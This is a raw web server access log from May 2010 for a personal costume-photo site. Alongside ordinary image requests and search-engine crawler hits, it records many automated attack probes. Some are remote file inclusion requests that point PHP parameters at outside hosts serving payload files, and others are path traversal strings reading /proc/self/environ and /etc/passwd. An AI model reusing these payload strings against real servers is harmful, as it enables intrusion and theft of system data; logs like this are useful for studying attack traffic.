173.18.214.163 - - [10/May/2010:21:47:12 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:12 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:14 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:15 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:46 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:47 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:47 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:47 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:47 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:47 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
173.18.214.163 - - [10/May/2010:21:47:47 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
114.108.151.149 - - [10/May/2010:21:47:53 -0500] "GET ///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:47:54 -0500] "GET /logs///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:47:54 -0500] "GET /logs/access_log.1264118400///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:47:54 -0500] "GET /logs/access_log.1262390400///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:48:15 -0500] "GET ///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:48:15 -0500] "GET /logs///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:48:16 -0500] "GET /logs/access_log.1264118400///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:21:48:22 -0500] "GET /logs/access_log.1262390400///skin/inrize_blue/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.250.255.243 - - [10/May/2010:21:48:27 -0500] "GET /logs/access_log.1241481600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.229 - - [10/May/2010:21:48:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.115.131.17 - - [10/May/2010:21:49:04 -0500] "GET /logs//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
203.115.131.17 - - [10/May/2010:21:49:05 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
211.232.85.247 - - [10/May/2010:21:49:19 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.232.85.247 - - [10/May/2010:21:49:19 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.232.85.247 - - [10/May/2010:21:49:19 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
207.46.204.229 - - [10/May/2010:21:49:35 -0500] "GET /logs/access_log.1258761600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.173.194.130 - - [10/May/2010:21:51:11 -0500] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:51:11 -0500] "GET /logs//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:51:12 -0500] "GET /logs/access_log.1262390400//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:51:16 -0500] "GET /logs/access_log.1265414400//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:52:07 -0500] "GET //?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:52:07 -0500] "GET /logs//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 5135 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:52:07 -0500] "GET /logs/access_log.1265414400//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:21:52:08 -0500] "GET /logs/access_log.1262390400//?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.127.70.140 - - [10/May/2010:21:54:31 -0500] "GET /logs/access_log.1270857600//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:21:54:31 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:21:54:31 -0500] "GET /logs//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
207.46.204.232 - - [10/May/2010:21:55:05 -0500] "GET /logs/access_log.1264809600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [10/May/2010:21:58:11 -0500] "GET /logs/access_log.1199404800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [10/May/2010:22:03:22 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [10/May/2010:22:06:16 -0500] "GET /logs/access_log.1230940800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [10/May/2010:22:06:40 -0500] "GET ////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:40 -0500] "GET /logs/access_log.1263254400////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:40 -0500] "GET /logs////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:48 -0500] "GET /logs/access_log.1265760000///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:48 -0500] "GET /logs///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:48 -0500] "GET ///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:54 -0500] "GET /logs/access_log.1265155200///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:54 -0500] "GET /logs/access_log.1263513600////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:57 -0500] "GET /logs////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:57 -0500] "GET /logs/access_log.1263254400////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:06:57 -0500] "GET ////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:06 -0500] "GET /logs/access_log.1265760000///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:06 -0500] "GET /logs///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:06 -0500] "GET ///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:10 -0500] "GET /logs/access_log.1263513600////index.php?option=com_akolegal&mosConfig_absolute_path=http://www.fileden.com/files/2010/2/9/2755444/ld1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:12 -0500] "GET /logs/access_log.1265155200///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.199.183 - - [10/May/2010:22:07:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [10/May/2010:22:07:41 -0500] "GET /logs/access_log.1229731200%20%20///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:41 -0500] "GET /logs///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:41 -0500] "GET ///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:43 -0500] "GET /logs///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:43 -0500] "GET ///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:43 -0500] "GET /logs/access_log.1229731200%20%20///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:56 -0500] "GET /logs/access_log.1237420800%20%20///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
114.108.151.149 - - [10/May/2010:22:07:58 -0500] "GET /logs/access_log.1237420800%20%20///src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
95.110.142.185 - - [10/May/2010:22:09:00 -0500] "GET /logs/access_log.1273190400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=' HTTP/1.1" 404 362 "-""libwww-perl/5.805"
95.110.142.185 - - [10/May/2010:22:09:00 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=' HTTP/1.1" 404 335 "-""libwww-perl/5.805"
95.110.142.185 - - [10/May/2010:22:09:00 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=' HTTP/1.1" 404 340 "-""libwww-perl/5.805"
209.59.147.177 - - [10/May/2010:22:09:09 -0500] "GET /shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.834"
207.46.204.227 - - [10/May/2010:22:09:35 -0500] "GET /logs/access_log.1206489600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.59.147.177 - - [10/May/2010:22:09:39 -0500] "GET /logs/access_log.1273190400/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.834"
209.59.147.177 - - [10/May/2010:22:09:39 -0500] "GET /shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.834"
209.59.147.177 - - [10/May/2010:22:09:39 -0500] "GET /logs/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.834"
203.115.131.17 - - [10/May/2010:22:10:18 -0500] "GET /logs/access_log.1270857600//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
203.115.131.17 - - [10/May/2010:22:10:19 -0500] "GET //index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
203.115.131.17 - - [10/May/2010:22:10:20 -0500] "GET /logs//index2.php?option=com_feederator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
207.46.13.137 - - [10/May/2010:22:11:35 -0500] "GET /logs/access_log.1253923200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.165.224 - - [10/May/2010:22:12:01 -0500] "GET /shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.834"
207.46.13.85 - - [10/May/2010:22:12:05 -0500] "GET /logs/access_log.1193529600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.165.224 - - [10/May/2010:22:13:31 -0500] "GET /logs/access_log.1273190400/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.834"
64.34.165.224 - - [10/May/2010:22:13:31 -0500] "GET /shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.834"
64.34.165.224 - - [10/May/2010:22:13:31 -0500] "GET /logs/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.834"
174.121.67.233 - - [10/May/2010:22:13:59 -0500] "GET /logs/access_log.1273190400/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
174.121.67.233 - - [10/May/2010:22:13:59 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
174.121.67.233 - - [10/May/2010:22:14:00 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
95.110.142.185 - - [10/May/2010:22:14:08 -0500] "GET /logs/access_log.1270857600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=' HTTP/1.1" 404 362 "-""libwww-perl/5.805"
216.227.221.228 - - [10/May/2010:22:14:28 -0500] "GET /logs/access_log.1273190400/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
216.227.221.228 - - [10/May/2010:22:14:29 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
216.227.221.228 - - [10/May/2010:22:14:29 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
209.59.147.177 - - [10/May/2010:22:16:42 -0500] "GET /logs/access_log.1273190400/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.834"
209.59.147.177 - - [10/May/2010:22:16:43 -0500] "GET /shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.834"
209.59.147.177 - - [10/May/2010:22:16:43 -0500] "GET /logs/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.834"
207.46.13.50 - - [10/May/2010:22:17:38 -0500] "GET /logs/access_log.1265328000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.165.224 - - [10/May/2010:22:17:52 -0500] "GET /logs/access_log.1273190400/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.834"
64.34.165.224 - - [10/May/2010:22:17:52 -0500] "GET /shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.834"
64.34.165.224 - - [10/May/2010:22:17:53 -0500] "GET /logs/shell../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.834"
207.46.199.54 - - [10/May/2010:22:18:06 -0500] "GET /logs/access_log.1157328000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.54 - - [10/May/2010:22:18:06 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.26.122.245 - - [10/May/2010:22:19:28 -0500] "GET /logs/access_log.1264550400/filnavn=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:22:19:28 -0500] "GET /logs/filnavn=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:22:19:28 -0500] "GET /filnavn=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.250.255.243 - - [10/May/2010:22:20:52 -0500] "GET /logs/access_log.1253664000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.126.56.210 - - [10/May/2010:22:23:05 -0500] "GET /logs/access_log.1268956800/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://kodil.web.id/bot/id.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
207.126.56.210 - - [10/May/2010:22:23:06 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://kodil.web.id/bot/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
207.126.56.210 - - [10/May/2010:22:23:06 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://kodil.web.id/bot/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
208.115.111.248 - - [10/May/2010:22:23:20 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
